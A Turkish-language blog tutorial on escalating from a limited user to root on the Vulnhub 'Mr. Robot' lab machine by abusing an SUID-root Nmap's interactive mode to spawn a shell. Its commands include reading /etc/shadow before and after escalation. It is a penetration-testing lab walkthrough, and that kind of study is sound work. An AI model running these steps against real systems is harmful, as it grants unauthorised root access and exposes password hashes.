SUID Biti Etkin Olan Nmap Aracı ile Hak Yükseltme İşleminin Gerçekleştirilmesi

Sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir sistemde, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de SUID biti etkin olan uygulamaların çalıştırılmasıdır. Bu yazıda, SUID biti etkin olan Nmap aracı kullanılan Mr. Robot sanal makinesi üzerinde standart kullanıcı haklarından “root” kullanıcısı hakkı ile komut satırı / kabuk elde edilecektir.

Not: Yazıda kullanılan Mr.Robot sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/mr-robot-1,151/

 

Erişim sağlanan kullanıcının (daemon) yetkilerinin sınırlı olduğu görülmektedir.

id
whoami
head -5 /etc/shadow

 

Mevcut sanal makinedeki Nmap aracının sahibinin “root” olduğu ve SUID bitinin etkin olduğu görülmektedir.

/usr/local/bin/nmap –-version
ls -la /usr/local/bin/nmap

 

Nmap aracı interaktif modda çalıştırıldığında işletim sistemi üzerinde kod çalıştırılabilir.

/usr/local/bin/nmap –interactive
h

 

!” ile işletim sistemi komutu çalıştırılabilmektedir. UID (User ID) için 1 değeri geldiği görülürken; EUID (Effective User ID) değerinin 0 olduğu görülmektedir.

!id

 

SUID bitinin etkinleştirilmesi sebebi ile uygulamanın sahibi (root) gibi komut çalıştırılabilmektedir.

!sh
id
whoami
head -5 /etc/shadow

 

Kaynak:

Privilege Escalation on Linux with Live examples

 

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.